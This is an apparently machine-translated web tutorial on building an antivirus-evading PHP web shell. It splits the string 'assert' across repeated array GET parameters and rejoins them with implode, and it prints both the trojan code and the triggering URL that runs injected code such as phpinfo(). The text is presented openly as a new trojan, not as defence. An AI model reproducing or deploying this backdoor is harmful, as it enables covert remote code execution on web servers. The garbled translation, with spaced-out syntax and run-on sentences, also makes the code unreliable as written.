Construct a php kill-free shell using repeated parameter array Variables

Recently, we found that php uses a very 2b string to construct an array: <? Php $ str = "a [] = 1 & a [] = 2 & B [] = 3"; parse_str ($ str, $ arr); print_r ($ arr );? The returned result of the preceding code is Array ([a] => Array ([0] => 1 [1] => 2) [B] => Array ([0] => 3), that is, when the character is followed by the "[]" symbol and has multiple similar structures, the returned array uses this character as the key name and generates an array key value. The content is the value of this character in the string that is equal to or greater, the Code should be easy to understand ). So now there is a problem, if a url is like this: http://example.com? P1 = v1 & p2 = v2 & p3 = v3 & p1 = v4 & p2 = v5 we use var_dump ($ _ GET ['p1']) the obtained result may be v1 or v4 based on different environments. What if I change p1 to p1? Array ([p1] => Array ([0] => v1 [1] => v4, let's change the url to something like this: http://www.bkjia.com/1.php? P1 [] = phpinfo & p2 [] = ass & p3 = v3 & p1 [] = (); & p2 [] = ert If php code is written as follows: <? Php $ a = implode ("", $ _ GET ['p1']); $ B = implode ("", $ _ GET ['p2']); var_dump ($ _ GET ['p1']); var_dump ($ _ GET ['p2']); $ B ($ a);?> Another new php trojan was created to witness a miracle!